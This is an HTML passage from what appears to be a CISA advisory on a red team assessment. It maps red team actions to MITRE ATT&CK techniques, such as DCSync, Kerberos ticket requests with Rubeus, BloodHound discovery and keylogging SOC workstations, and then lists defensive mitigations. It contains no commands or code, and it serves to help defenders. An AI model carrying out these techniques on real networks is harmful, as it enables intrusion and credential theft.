&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 7. Credential Access&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Unsecured Credentials&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1552/&quot; target=&quot;_blank&quot; title=&quot;T1552&quot;&gt;T1552&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The red team located cleartext credentials on an administrative user’s workstation.&lt;/p&gt;
&lt;p&gt;The red team used the open source tool ADConnectDump to obtain cleartext credentials for cloud accounts.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unsecured Credentials: Credentials In Files&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1552/001/&quot; target=&quot;_blank&quot; title=&quot;T1552.001&quot;&gt;T1552.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The red team searched a targeted user’s workstations for &lt;code&gt;connections.json&lt;/code&gt; and &lt;code&gt;product-preferences.xml&lt;/code&gt; files for a SQL Developer tool. They then decrypted these files to obtain cleartext password to the database.&lt;/p&gt;
&lt;p&gt;The red team acquired long-lived static AWS IAM user credentials in configuration files in users’ home directories.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OS Credential Dumping&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/&quot; target=&quot;_blank&quot; title=&quot;T1003&quot;&gt;T1003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team obtained cleartext credentials for an on-prem MSOL account and Entra account.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OS Credential Dumping: DCSync&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/006/&quot; target=&quot;_blank&quot; title=&quot;T1003.006&quot;&gt;T1003.006&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used DCSync to obtain AD account credentials.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Steal or Forge Authentication Certificates&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1649/&quot; target=&quot;_blank&quot;&gt;T1649&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team could obtain certificates for any Organization A user account. This provided the means for lateral movement.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Steal or Forge Kerberos Tickets&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1558/&quot; target=&quot;_blank&quot; title=&quot;T1558&quot;&gt;T1558&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The red team used a Kerberos TGT to request a Kerberos service ticket for a web server’s SPN.&lt;/p&gt;
&lt;p&gt;The red team used the Rubeus “asktgs” module to request service tickets used for SSO.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 8. Discovery&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Account Discovery: Domain Account&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1087/002/&quot; target=&quot;_blank&quot; title=&quot;T1087.002&quot;&gt;T1087.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used a BloodHound collector to query and scrape AD information, including AD users.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote System Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1018/&quot; target=&quot;_blank&quot; title=&quot;T1018&quot;&gt;T1018&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used a BloodHound collector to query and scrape AD information, including computers.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Permission Groups Discovery: Domain Groups&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1069/002&quot; target=&quot;_blank&quot; title=&quot;T1069.002&quot;&gt;T1069.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used a BloodHound collector to query and scrape AD information, including groups.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Group Policy Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1615/&quot; target=&quot;_blank&quot; title=&quot;T1615&quot;&gt;T1615&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used a BloodHound collector to query and scrape AD information, including GPOs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Owner/User Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1033/&quot; target=&quot;_blank&quot; title=&quot;T1033&quot;&gt;T1033&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team queried SCCM servers to enumerate user-device relationships and identify the workstations assigned to users.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud Service Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1526/&quot; target=&quot;_blank&quot; title=&quot;T1526&quot;&gt;T1526&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used publicly available tools to obtain a list of Entra applications, their permissions, and their owners.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 9. Lateral Movement&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Use Alternate Authentication Material: Application Access Token&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/001/&quot; target=&quot;_blank&quot; title=&quot;T1550.001&quot;&gt;T1550.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used an application access token to access and review cloud emails.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Services: SSH&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/004/&quot; target=&quot;_blank&quot; title=&quot;T1021.004&quot;&gt;T1021.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used FTP credentials to log into a bastion host over SSH.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 10. Collection&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Email Collection&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot; title=&quot;T1114&quot;&gt;T1114&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The red team reviewed Organization A SOC staff cloud emails to see if SOC staff were aware of the compromise.&lt;/p&gt;
&lt;p&gt;The red team&amp;nbsp;had the ability to retrieve the emails of every user within Organization B’s environment from the public internet.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Screen Capture&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1113/&quot; target=&quot;_blank&quot; title=&quot;T1113&quot;&gt;T1113&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team took screenshots of SOC staff workstations.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Input Capture: Keylogging&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1056/001/&quot; target=&quot;_blank&quot; title=&quot;T1056.001&quot;&gt;T1056.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used keyloggers on SOC staff workstations.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data from Information Repositories: Messaging Applications&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1213/005/&quot; target=&quot;_blank&quot; title=&quot;T1213.005&quot;&gt;T1213.005&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team pulled Microsoft Teams messages from SOC staff workstations.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table11&quot;&gt;&lt;em&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;em&gt;&lt;strong&gt;. Command and Control&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Proxy: Internal Proxy&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/001/&quot; target=&quot;_blank&quot; title=&quot;T1090.001&quot;&gt;T1090.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team proxied through compromised workstations.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;CISA recommends that organizations implement the mitigations below to strengthen their cybersecurity posture based on the &lt;a href=&quot;#Lessons&quot;&gt;&lt;strong&gt;Lessons Learned&lt;/strong&gt;&lt;/a&gt; and identified &lt;a href=&quot;#Issues&quot;&gt;&lt;strong&gt;Issues&lt;/strong&gt;&lt;/a&gt;. These mitigations align with the &lt;a href=&quot;https://www.cisa.gov/cpg&quot;&gt;Cross-Sector Cybersecurity Performance Goals (CPGs)&lt;/a&gt; developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s &lt;a href=&quot;https://www.cisa.gov/cpg&quot;&gt;CPGs webpage&lt;/a&gt; for more information on the CPGs, including additional recommended baseline protections.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Establish Baselines and Improve Monitoring&lt;/strong&gt;&lt;/h3&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Establish and continuously maintain a baseline of installed tools and software, account behavior, and network traffic&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reduce alert noise&lt;/strong&gt; by refining monitoring tools and alerting mechanisms to differentiate between typical administrative actions and potential threat behavior.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;For information on establishing a baseline and reducing alert noise, see CISA’s joint Guidance&amp;nbsp;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques&quot; title=&quot;Identifying and Mitigating Living Off the Land Techniques&quot;&gt;Identifying and Mitigating Living Off the Land Techniques&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Eliminate Silos and Bureaucratic Hurdles&lt;/strong&gt;&lt;/h3&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Break down silos&lt;/strong&gt; by encouraging regular communication and collaboration between IT, security, and business units.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Consider using joint exercises, shared tools, and creating cross-functional teams.&lt;/li&gt;
&lt;li&gt;Integrate detection with incident response workflows to enable rapid containment and remediation.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Empower network defenders&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Develop and communicate policies [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishCybersecurityResponsibilities1A&quot; title=&quot;CPG 1.A&quot;&gt;CPG 1.A&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ManageCybersecurityOversight1B&quot; title=&quot;CPG 1.B&quot;&gt;CPG 1.B&lt;/a&gt;] that support rapid, coordinated response and clarify when defenders can act independently versus when escalation is required.&lt;br&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Define clear roles and responsibilities so defenders know their authorities and escalation paths (if needed) during incidents.&lt;/li&gt;
&lt;li&gt;Grant defenders the authority to take necessary actions (e.g., isolating systems, blocking traffic) without excessive approvals.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Conduct training and simulated incident response exercises to reinforce roles, improve coordination, and identify gaps in authorities or communication [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IncidentPlanningandPreparedness6A&quot; title=&quot;CPG 6.A&quot;&gt;CPG 6.A&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Enhance Cloud Security Controls&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; While both organizations used Microsoft Entra ID and Organization B also used AWS, many of the techniques used by the red team are applicable across identity providers and cloud environments and not necessarily unique to Microsoft and AWS. CISA encourages all organizations using cloud environments to implement the recommendations below.&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Secure and monitor access/refresh tokens and&amp;nbsp;establish and regularly review comprehensive procedures for detecting, remediating, and revoking access/refresh tokens&lt;/strong&gt; in the event of a cloud compromise.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Implement automated token revocation and access reviews and conduct periodic incident response exercises to validate the effectiveness of these processes.&lt;/li&gt;
&lt;li&gt;Restrict access based on trusted network locations, device compliance, and risk signals (such as unusual activity or sign-in patterns).&lt;/li&gt;
&lt;li&gt;Monitor sign-in logs and policy evaluation results for workload identities to detect suspicious activity.&lt;/li&gt;
&lt;li&gt;Regularly check application permissions; make a risk-informed decision to identify and remove any that are not necessary, so each application only has the access it needs to function.&lt;/li&gt;
&lt;li&gt;Regularly audit SP credentials and rotate secrets or certificates to reduce exposure.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Identify and disable legacy accounts.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enable phishing-resistant MFA&amp;nbsp;&lt;/strong&gt;for all user, administrative, and privileged accounts in cloud platforms [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F&quot; title=&quot;CPG 3.F&quot;&gt;CPG 3.F&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Protect keys and secrets by storing them securely&amp;nbsp;&lt;/strong&gt;and enforcing mandatory rotation schedules; apply cryptographic boundary controls to internal and third-party credentials.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Set up automated alerts for suspicious cloud application activity&lt;/strong&gt;, such as abnormal API calls, and credential activity, such as login attempts from unusual locations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Leverage user and entity behavior analytics&lt;/strong&gt; to analyze and correlate activities across multiple data sources and identify unusual credential or token usage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuously audit authentication and access logs&lt;/strong&gt; for signs of replay or unauthorized access.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement just-in-time (JIT) access&lt;/strong&gt; for privileged accounts, replacing standing administrative rights with temporary, time-bound privilege elevations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For organizations using Entra ID:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Monitor and control who has access to application identities.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;&lt;strong&gt;Implement CAPs for workload identities&lt;/strong&gt; and monitor for excessive or unused permissions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use Microsoft’s app governance to detect and manage risky SPs&lt;/strong&gt;, which are special accounts used by applications and services. See Microsoft’s &lt;a href=&quot;https://learn.microsoft.com/en-us/defender-cloud-apps/app-governance-visibility-insights-overview&quot; target=&quot;_blank&quot; title=&quot;OAuth app visibility and insights with app governance - Microsoft Defender for Cloud Apps&quot;&gt;OAuth app visibility and insights with app governance - Microsoft Defender for Cloud Apps&lt;/a&gt; for more information.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integrate Entra ID tenant monitoring with on-prem security operations&lt;/strong&gt; to promptly identify suspicious activity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regularly review and restrict application permissions&lt;/strong&gt; (e.g., &lt;code&gt;Mail.Read&lt;/code&gt;, &lt;code&gt;Files.Read.All&lt;/code&gt;).&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;For guidance, see CISA’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project&quot; title=&quot;Secure Cloud Business Applications (SCuBA) Project&quot;&gt;Secure Cloud Business Applications (SCuBA) Project&lt;/a&gt;, which provides secure configuration baselines for Microsoft 365 (M365), including Microsoft Entra ID.&lt;/li&gt;
&lt;li&gt;Use CISA’s &lt;a href=&quot;https://github.com/cisagov/ScubaGear&quot; target=&quot;_blank&quot; title=&quot;ScubaGear&quot;&gt;ScubaGear&lt;/a&gt;, a no-cost assessment tool that verifies M365 tenant configuration alignment to the policies described in SCuBA’s secure configuration baselines.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use certificate-based authentication certificates for application authentication&lt;/strong&gt; instead of client secrets, when possible. See Microsoft’s &lt;a href=&quot;https://learn.microsoft.com/en-us/entra/identity/authentication/how-to-certificate-based-authentication&quot; target=&quot;_blank&quot; title=&quot;Set Up Microsoft Entra CBA - Microsoft Entra ID&quot;&gt;Set Up Microsoft Entra CBA - Microsoft Entra ID&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Review newly created secrets and/or certificates&lt;/strong&gt; on existing applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limit secret lifetimes to a reasonable lifetime&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In AWS environments:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Mitigate the risks of long-lived IAM user credentials.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Identify and audit all existing access keys and disable/delete unused or unnecessary keys.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Require human users to use temporary AWS credentials through SSO.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Users will assume an IAM role for AWS access and receive temporary credentials that expire within an hour.&lt;/li&gt;
&lt;li&gt;For more information on accessing AWS using temporary credentials, see Amazon’s documentation &lt;a href=&quot;https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html&quot; target=&quot;_blank&quot; title=&quot;Security best practices in IAM&quot;&gt;Security best practices in IAM&lt;/a&gt; and &lt;a href=&quot;https://docs.aws.amazon.com/IAM/latest/UserGuide/introduction_identity-management.html&quot; target=&quot;_blank&quot; title=&quot;Compare IAM identities and credentials&quot;&gt;Compare IAM identities and credentials&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regularly review the environment to verify no long-lived credentials remain.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Secure Active Directory and Manage Credentials&lt;/strong&gt;&lt;/h3&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Apply secure configurations to ADCS implementations.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Disable the &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; flag from templates to prevent users from supplying and editing sensitive security settings within these templates.&lt;/li&gt;
&lt;li&gt;Restrict accounts that can enroll in all certificate templates to only those necessary, especially templates with the &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; flag.&lt;/li&gt;
&lt;li&gt;Remove &lt;code&gt;FullControl&lt;/code&gt;, &lt;code&gt;WriteDacl&lt;/code&gt;, and &lt;code&gt;Write&lt;/code&gt; property permissions from low-privileged groups, such as domain users, to certificate template objects, where such permissions are not needed.&lt;/li&gt;
&lt;li&gt;Enforce manager approval for requested certificates.&lt;/li&gt;
&lt;li&gt;Apply additional guidance from CISA’s joint Guidance &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/detecting-and-mitigating-active-directory-compromises&quot; title=&quot;Detecting and Mitigating Active Directory Compromises&quot;&gt;Detecting and Mitigating Active Directory Compromises&lt;/a&gt; (see Mitigating AD CS compromise, pages 15–16).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure the MAQ to zero unless there is a specific operational need for non-administrative users to create computer accounts&lt;/strong&gt;;&amp;nbsp;this prevents standard user accounts from creating new machine accounts, reducing opportunities for malicious cyber actors to abuse this privilege.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;If some standard user accounts need to create computer accounts, set MAQ to the lowest possible value and restrict this capability to only users or groups with a business justification.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improve credential hygiene&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Scan network shares and workstations for plaintext credentials and remove any found.&lt;/li&gt;
&lt;li&gt;Train staff on secure password storage practices and enforce policies prohibiting plaintext password storage.&lt;/li&gt;
&lt;li&gt;Use encrypted password vaults for storing credentials and limit access to only those who require it.&lt;/li&gt;
&lt;li&gt;Periodically audit credential stores and access logs for signs of misuse.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Periodically audit AD permissions&amp;nbsp;&lt;/strong&gt;for misconfigurations and excessively privileged groups and accounts.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Implement the principle of least privilege [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementthePrinciplesofLeastPrivilege3H&quot; title=&quot;CPG 3.H&quot;&gt;CPG 3.H&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business applications.&lt;/li&gt;
&lt;li&gt;Periodically audit standard user accounts and minimize privileged access.&lt;/li&gt;
&lt;li&gt;Periodically audit AD permissions to verify that standard user accounts do not have excessive permissions and have not been added to admin groups.&lt;/li&gt;
&lt;li&gt;Evaluate which administrative groups should administer specific servers and workstations.&lt;/li&gt;
&lt;li&gt;Separate administrator accounts from standard user accounts [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#AdministratorsMaintainSeparateUserandPrivilegedAccounts3G&quot; title=&quot;CPG 3.G&quot;&gt;CPG 3.G&lt;/a&gt;].&lt;br&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Use designated workstations for administrators and standard users and prevent administrators from using admin workstations for non-admin purposes; this would reduce impact of credential theft from a user workstation.&lt;/li&gt;
&lt;li&gt;Use designated administrative accounts exclusively for admin purposes.&lt;/li&gt;
&lt;li&gt;If a standard user account needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources.&lt;br&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;PAM solutions can log and alert usage to detect unusual activity, which could have alerted the assessed organizations when the red team accessed resources with admin accounts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Note:&lt;/strong&gt; Treat password vaults associated with PAM solutions as high value assets (HVAs) with additional restrictions and monitoring.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Configure time-based access for accounts set at the admin level and higher.&lt;br&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;The just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the zero trust model. A network-wide policy automatically disables administrator accounts at the AD level when the account is not needed. When standard user accounts need administrative access, they submit their requests through an automated process that enables access to a system, but only for a set timeframe to support task completion.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Secure Endpoint Configuration Managers&lt;/strong&gt;&lt;/h3&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Treat endpoint management systems (such as SCCM) as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Segment Operational Technology Networks&lt;/strong&gt;&lt;/h3&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Implement strict firewall rules and access controls between IT and OT environments [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementLogicalPhysicalNetworkSegmentation3I&quot; title=&quot;CPG 3.I&quot;&gt;CPG 3.I&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Limit jump server access to OT networks and require MFA for all connections.&lt;/li&gt;
&lt;li&gt;Regularly review OT network architecture and access paths to minimize unnecessary connectivity.&lt;/li&gt;
&lt;li&gt;Monitor OT network traffic for signs of lateral movement or unauthorized access.&lt;/li&gt;
&lt;li&gt;Implement change management solutions to track and restrict modifications to OT components.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Validate Security Controls&lt;/strong&gt;&lt;/h2&gt;
